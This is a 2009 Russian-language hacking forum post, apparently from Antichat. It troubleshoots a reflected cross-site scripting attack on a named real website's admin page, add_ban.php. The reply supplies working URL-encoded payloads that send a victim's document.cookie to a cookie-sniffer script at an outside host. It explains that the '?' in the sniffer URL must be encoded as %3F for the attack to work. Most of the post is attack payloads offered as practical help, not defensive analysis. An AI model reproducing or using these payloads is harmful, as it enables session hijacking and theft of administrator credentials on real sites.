03.12.2009, 16:32
|
|
Members of Antichat - Level 5
Регистрация: 28.05.2007
Сообщений: 729
С нами:
9976706
Репутация:
1934
|
|
Сообщение от svesve
http://bans.eqline.ru/admin/add_ban.php/"><script>alert(document.cookie)</script>
если будем засылть на сниффер
типа document.location.href="http://site/sniff.php?"+document.cookie;
то XSS не отрабатывет, убираем ? и все ок,но не то ))))
в чем проблема?
вот так работает редирект с куками
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.assign(%22http ://ya.ru/%3F%22+document.cookie);%3C/script%3E%3C!--
короче нужно ? заменить на %3F
так же работает
http://bans.eqline.ru/admin/add_ban.php/%22%3E%3Cscript%3Edocument.location.href=%22http://site/sniff.php%3f%22+document.cookie;%3C/script%3E%3C!--
__________________
Появляюсь редко. Важные дела в реале.
Последний раз редактировалось AFoST; 03.12.2009 в 16:35..
|
|
|